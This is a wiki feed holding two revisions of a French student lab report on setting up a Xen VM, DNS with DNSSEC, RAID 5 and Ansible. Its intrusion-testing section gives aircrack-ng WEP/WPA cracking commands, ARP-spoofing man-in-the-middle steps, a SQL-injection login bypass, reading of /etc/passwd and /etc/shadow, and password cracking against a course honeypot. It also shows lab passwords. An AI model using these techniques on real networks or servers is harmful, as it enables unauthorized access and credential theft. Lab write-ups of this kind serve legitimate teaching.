https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&feedformat=atom&user=PvernierWiki d'activités IMA - Contributions de l’utilisateur [fr]2026-05-13T00:22:02ZContributions de l’utilisateurMediaWiki 1.29.2https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55141TP sysres IMA5sc 2020/2021 G92020-12-21T17:58:21Z<p>Pvernier : /* Sécurisation de données */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
===Sécurisation de site web par certificat===<br />
<br />
La première étape est de générer un certificat à l'aide de la commande suivante :<br />
<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout calicedelamort.site.key -out calicedelamort.site.csr<br />
<br />
Ensuite, on se rend sur gandi.net, et nous ajoutons le certificat généré à notre domaine calicedelamort.site. Ensuite, nous attendons d'obtenir le certificat signé sur le serveur de mail que nous avons installé sur notre VM.<br />
<br />
===Sécurisation de serveur DNS par DNSSEC===<br />
<br />
En premier lieu, nous devons activer le protocole DNSSEC dans le fichier de configuration de bind : /etc/bind/named.conf.local<br />
<br />
dnssec-enable yes<br />
<br />
Ensuite, nous créons un dossier calicedelamort.site.dnssec/ puis nous y générons les clefs ZSK et KSK à l'aide des commandes suivantes :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE calicedelamort.site<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE calicedelamort.site<br />
<br />
Puis, nous allons dans le fichier de configuration de notre site : /etc/bind/db.calicedelamort.site, et nous y ajoutons les deux lignes suivantes :<br />
<br />
$include /etc/bind/calicedelamort.site.dnssec/calicedelamort.site-ksk.key<br />
$include /etc/bind/calicedelamort.site.dnssec/calicedelamort.site-zsk.key<br />
<br />
Enfin, nous signons le tout à l'aide de la commande :<br />
<br />
dnssec-signzone -o calicedelamort.site -k calicedelamort.site-ksk ../db.calicedelamort.site calicedelamort.site-zsk <br />
<br />
Dans le fichier /etc/bind/named.conf.local, nous modifions la zone pour y mettre le fichier signé :<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site.signed";<br />
allow-transfer{217.70.177.40;};<br />
};<br />
<br />
Pour finir, nous relançons bind9 :<br />
<br />
service bind9 restart<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
[[Fichier:Crack_resultat_WPA.PNG|center]]<br />
<br />
Il est aussi possible de cracker la clef avec hashcat. Cela permet de d'utiliser la puissance du GPU pour brute force la clef. Grace à ma super carte graphique la 2080 super, nous avons pu diviser par 100 le temps du brute force.<br />
<br />
La commande est la suivante:<br />
crunch 8 8 0123456789 | hashcat -m 2500 output.hccapx<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
[[Fichier:Wiresharck.jpg|center|400px]]<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
<br />
Pour cette partie, on se rend sur le lien http://honey.plil.info.<br />
Nous y trouvons une page de connexion demandant un login et un password.<br />
<br />
N'ayant pas de compte sur ce site, on essaye une simple injection SQL :<br />
Dans les champs 'login' et 'password' on écrit l'injection SQL suivante : " ' OR 1 = 1 -- "<br />
Ca fonctionne ! Nous avons accès aux informations de connexion des utilisateurs<br />
<br />
<br />
Grâce aux informations trouvées à l'aide de l'injection SQL nous pouvons nous connecter en tant qu'administrateur.<br />
En explorant un peu le site, nous trouvons une fonctionnalité qui permet d'importer des fichiers sur la page web et de les télécharger.<br />
<br />
[[Fichier:Ajoutmanuel.png|center]]<br />
<br />
<br />
En parallèle de cela, à l'aide de la commande<br />
dirb http://honey.plil.info/<br />
On trouve une page phpmyadmin : http://honey.plil.info/phpmyadmin<br />
<br />
[[Fichier:phpmyadmin.png|center]]<br />
<br />
Encore une page de connexion, il faut donc trouver le login et le password permettant de se connecter à cette page. Cette fois, les injections SQL ne fonctionne pas.<br />
<br />
Cependant, nous avons vu plus tôt que nous pouvions importer et télécharger des fichiers depuis la page web précédente, et en effectuant quelques tests, nous nous sommes rendu compte que ces fichiers provenaient du serveur qui hébergeait le site web.<br />
<br />
En regardant sur internet, nous avons trouvé que le fichier contenant les logins et mot de passes de connexion à la page phpmyadmin se trouvaient dans /etc/phpmyadmin/config-db.php<br />
<br />
Nous uploadons et téléchargeons ce fichier depuis la page web :<br />
<br />
[[Fichier:Config_dbphp.png|center]]<br />
<br />
Nous avons maintenant accès à la page de gestion de la base de données du serveur.<br />
<br />
<br />
Maintenant que l'on sait que l'on peut télécharger des fichiers depuis le serveur, on décide de télécharger le fichier /etc/passwd :<br />
<br />
[[Fichier:Passwd.PNG|center]]<br />
<br />
<br />
On trouve l'utilisateur 'rex' sur lequel on pourrait tenter de se connecter en ssh. Nous essayons, cependant, il nous faut le mot de passe de cet utilisateur. Explorons donc phpmyadmin en s'y connectant en tant que root.<br />
<br />
En cherchant bien, on trouve un fichiers 'users' (dans la structure 'test') dans lequel apparait le mot de passe de l'utilisateur 'rex' en clair.<br />
<br />
On se connecte donc en ssh sur cet utilisateur.<br />
ssh rex@honey.plil.info<br />
<br />
La dernière étape est donc de récupérer le mot de passe root du serveur. Or, on sait que celui-ci se trouve dans le fichier /etc/shadow , fichier qui est, bien entendu, accessible depuis l'utilisateur 'rex'.<br />
<br />
Une fois ce fichier récupéré, il ne nous reste plus qu'à brute force le mot de passe root.<br />
<br />
On utilise le programme 'John The Ripper', cependant, il nous faut un dictionnaire pour aider John The Riper.<br />
On sait que le mot de passe root à la même particularité que les mots de passes des machines de TPs. On crée donc un dictionnaire en fonction de cette information à l'aide de la commande 'crunch'.<br />
<br />
On peut finalement lancer John The Riper avec le dictionnaire, on trouve le mot de passe, et on peut enfin se connecter en tant qu'utilisateur root sur le serveur.<br />
<br />
==Réalisation==<br />
<br />
===Sécurisation de données===<br />
Nous avons dans un premier temps créé 3 partitions virtuelles:<br />
<br />
lvcreate -L1G -n calicedelamort-raid1 storage<br />
lvcreate -L1G -n calicedelamort-raid2 storage<br />
lvcreate -L1G -n calicedelamort-raid3 storage<br />
<br />
Ensuite, nous les avons ajoutées dans notre fichier: /etc/xen/Calicedelamort.cfg<br />
<br />
disk = [<br />
'file:/usr/local/xen/domains/Calicedelamort/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Calicedelamort/swap.img,xvda1,w',<br />
'phy:/dev/storage/PaulTanguy1,xvda3,w',<br />
'phy:/dev/storage/PaulTanguy2,xvda4,w',<br />
'phy:/dev/storage/calicedelamort-raid1,xvda5,w',<br />
'phy:/dev/storage/calicedelamort-raid2,xvda6,w',<br />
'phy:/dev/storage/calicedelamort-raid3,xvda7,w',<br />
]<br />
<br />
il faut ensuite redémarrer notre VM:<br />
<br />
xl destroy Calicedelamort<br />
xl create /etc/xen/Calicedelamort.cfg<br />
<br />
Suite à cela nous installons mdadm qui est l'utilitaire standard sous Linux utilisé pour gérer les périphériques RAID logiciel:<br />
<br />
apt instal mdadm<br />
<br />
Ensuite, nous construisons notre volume RAID 5, et on s'assure qu'il fonctionne à chaque démarrage.<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7 <br />
mdadm --monitor --daemonise /dev/md0<br />
<br />
On formate notre volume RAID.<br />
mkfs.ext4 /dev/md0 <br />
<br />
On rajoute cette ligne dans le fstab : <br />
/dev/md0 /raid5 ext4 defaults 0 2<br />
<br />
<br />
Pour finir, on peuple notre volume RAID.<br />
mkdir /raid5<br />
mount -a<br />
touch /raid5/test<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)<br />
<br />
On crée ensuite un inventaire : /etc/ansible/hosts<br />
<br />
[Me_Chassiron]<br />
calicedelamort ansible_host=192.168.42.9<br />
[All_Chassiron]<br />
calicedelamort ansible_host=192.168.42.9<br />
truffe ansible_host=192.168.42.12<br />
girolle ansible_host=192.168.42.7<br />
amanite ansible_host=192.168.42.5<br />
tricholome ansible_host=192.168.42.4<br />
ophiocordyceps ansible_host=192.168.42.2<br />
<br />
Une fois ces étapes réalisées, nous créons un premier rôle ansible qui va venir modifier le fichier /etc/motd de notre VM sur chassiron, ainsi qu'installer les paquetages NTP et copier les fichiers de configuration NTP de notre VM sur capbreton.<br />
<br />
- name: Modification de /etc/motd<br />
copy:<br />
src: "../files/modif_motd"<br />
dest: "/etc/motd"<br />
owner: root<br />
group: root<br />
mode: '0644'<br />
<br />
- name: Installation de ntp<br />
apt:<br />
name: ntp<br />
state: latest<br />
<br />
- name: Copie de ntp conf<br />
copy:<br />
src: "../files/ntp.conf"<br />
dest: "/etc/ntp.conf"<br />
owner: root<br />
group: root<br />
mode: '0644'<br />
<br />
===Docker===</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55138TP sysres IMA5sc 2020/2021 G92020-12-21T17:45:53Z<p>Pvernier : /* Sécurisation de données */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
===Sécurisation de site web par certificat===<br />
<br />
La première étape est de générer un certificat à l'aide de la commande suivante :<br />
<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout calicedelamort.site.key -out calicedelamort.site.csr<br />
<br />
Ensuite, on se rend sur gandi.net, et nous ajoutons le certificat généré à notre domaine calicedelamort.site. Ensuite, nous attendons d'obtenir le certificat signé sur le serveur de mail que nous avons installé sur notre VM.<br />
<br />
===Sécurisation de serveur DNS par DNSSEC===<br />
<br />
En premier lieu, nous devons activer le protocole DNSSEC dans le fichier de configuration de bind : /etc/bind/named.conf.local<br />
<br />
dnssec-enable yes<br />
<br />
Ensuite, nous créons un dossier calicedelamort.site.dnssec/ puis nous y générons les clefs ZSK et KSK à l'aide des commandes suivantes :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE calicedelamort.site<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE calicedelamort.site<br />
<br />
Puis, nous allons dans le fichier de configuration de notre site : /etc/bind/db.calicedelamort.site, et nous y ajoutons les deux lignes suivantes :<br />
<br />
$include /etc/bind/calicedelamort.site.dnssec/calicedelamort.site-ksk.key<br />
$include /etc/bind/calicedelamort.site.dnssec/calicedelamort.site-zsk.key<br />
<br />
Enfin, nous signons le tout à l'aide de la commande :<br />
<br />
dnssec-signzone -o calicedelamort.site -k calicedelamort.site-ksk ../db.calicedelamort.site calicedelamort.site-zsk <br />
<br />
Dans le fichier /etc/bind/named.conf.local, nous modifions la zone pour y mettre le fichier signé :<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site.signed";<br />
allow-transfer{217.70.177.40;};<br />
};<br />
<br />
Pour finir, nous relançons bind9 :<br />
<br />
service bind9 restart<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
[[Fichier:Crack_resultat_WPA.PNG|center]]<br />
<br />
Il est aussi possible de cracker la clef avec hashcat. Cela permet de d'utiliser la puissance du GPU pour brute force la clef. Grace à ma super carte graphique la 2080 super, nous avons pu diviser par 100 le temps du brute force.<br />
<br />
La commande est la suivante:<br />
crunch 8 8 0123456789 | hashcat -m 2500 output.hccapx<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
[[Fichier:Wiresharck.jpg|center|400px]]<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
<br />
Pour cette partie, on se rend sur le lien http://honey.plil.info.<br />
Nous y trouvons une page de connexion demandant un login et un password.<br />
<br />
N'ayant pas de compte sur ce site, on essaye une simple injection SQL :<br />
Dans les champs 'login' et 'password' on écrit l'injection SQL suivante : " ' OR 1 = 1 -- "<br />
Ca fonctionne ! Nous avons accès aux informations de connexion des utilisateurs<br />
<br />
<br />
Grâce aux informations trouvées à l'aide de l'injection SQL nous pouvons nous connecter en tant qu'administrateur.<br />
En explorant un peu le site, nous trouvons une fonctionnalité qui permet d'importer des fichiers sur la page web et de les télécharger.<br />
<br />
[[Fichier:Ajoutmanuel.png|center]]<br />
<br />
<br />
En parallèle de cela, à l'aide de la commande<br />
dirb http://honey.plil.info/<br />
On trouve une page phpmyadmin : http://honey.plil.info/phpmyadmin<br />
<br />
[[Fichier:phpmyadmin.png|center]]<br />
<br />
Encore une page de connexion, il faut donc trouver le login et le password permettant de se connecter à cette page. Cette fois, les injections SQL ne fonctionne pas.<br />
<br />
Cependant, nous avons vu plus tôt que nous pouvions importer et télécharger des fichiers depuis la page web précédente, et en effectuant quelques tests, nous nous sommes rendu compte que ces fichiers provenaient du serveur qui hébergeait le site web.<br />
<br />
En regardant sur internet, nous avons trouvé que le fichier contenant les logins et mot de passes de connexion à la page phpmyadmin se trouvaient dans /etc/phpmyadmin/config-db.php<br />
<br />
Nous uploadons et téléchargeons ce fichier depuis la page web :<br />
<br />
[[Fichier:Config_dbphp.png|center]]<br />
<br />
Nous avons maintenant accès à la page de gestion de la base de données du serveur.<br />
<br />
<br />
Maintenant que l'on sait que l'on peut télécharger des fichiers depuis le serveur, on décide de télécharger le fichier /etc/passwd :<br />
<br />
[[Fichier:Passwd.PNG|center]]<br />
<br />
<br />
On trouve l'utilisateur 'rex' sur lequel on pourrait tenter de se connecter en ssh. Nous essayons, cependant, il nous faut le mot de passe de cet utilisateur. Explorons donc phpmyadmin en s'y connectant en tant que root.<br />
<br />
En cherchant bien, on trouve un fichiers 'users' (dans la structure 'test') dans lequel apparait le mot de passe de l'utilisateur 'rex' en clair.<br />
<br />
On se connecte donc en ssh sur cet utilisateur.<br />
ssh rex@honey.plil.info<br />
<br />
La dernière étape est donc de récupérer le mot de passe root du serveur. Or, on sait que celui-ci se trouve dans le fichier /etc/shadow , fichier qui est, bien entendu, accessible depuis l'utilisateur 'rex'.<br />
<br />
Une fois ce fichier récupéré, il ne nous reste plus qu'à brute force le mot de passe root.<br />
<br />
On utilise le programme 'John The Ripper', cependant, il nous faut un dictionnaire pour aider John The Riper.<br />
On sait que le mot de passe root à la même particularité que les mots de passes des machines de TPs. On crée donc un dictionnaire en fonction de cette information à l'aide de la commande 'crunch'.<br />
<br />
On peut finalement lancer John The Riper avec le dictionnaire, on trouve le mot de passe, et on peut enfin se connecter en tant qu'utilisateur root sur le serveur.<br />
<br />
==Réalisation==<br />
<br />
===Sécurisation de données===<br />
Nous avons dans un premier temps créé 3 partitions virtuelles:<br />
<br />
lvcreate -L1G -n calicedelamort-raid1 storage<br />
lvcreate -L1G -n calicedelamort-raid2 storage<br />
lvcreate -L1G -n calicedelamort-raid3 storage<br />
<br />
Ensuite, nous les avons ajoutées dans notre fichier: /etc/xen/Calicedelamort.cfg<br />
<br />
disk = [<br />
'file:/usr/local/xen/domains/Calicedelamort/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Calicedelamort/swap.img,xvda1,w',<br />
'phy:/dev/storage/PaulTanguy1,xvda3,w',<br />
'phy:/dev/storage/PaulTanguy2,xvda4,w',<br />
'phy:/dev/storage/calicedelamort-raid1,xvda5,w',<br />
'phy:/dev/storage/calicedelamort-raid2,xvda6,w',<br />
'phy:/dev/storage/calicedelamort-raid3,xvda7,w',<br />
]<br />
<br />
il faut ensuite redémarrer notre VM:<br />
<br />
xl destroy Calicedelamort<br />
xl create /etc/xen/Calicedelamort.cfg<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)<br />
<br />
On crée ensuite un inventaire : /etc/ansible/hosts<br />
<br />
[Me_Chassiron]<br />
calicedelamort ansible_host=192.168.42.9<br />
[All_Chassiron]<br />
calicedelamort ansible_host=192.168.42.9<br />
truffe ansible_host=192.168.42.12<br />
girolle ansible_host=192.168.42.7<br />
amanite ansible_host=192.168.42.5<br />
tricholome ansible_host=192.168.42.4<br />
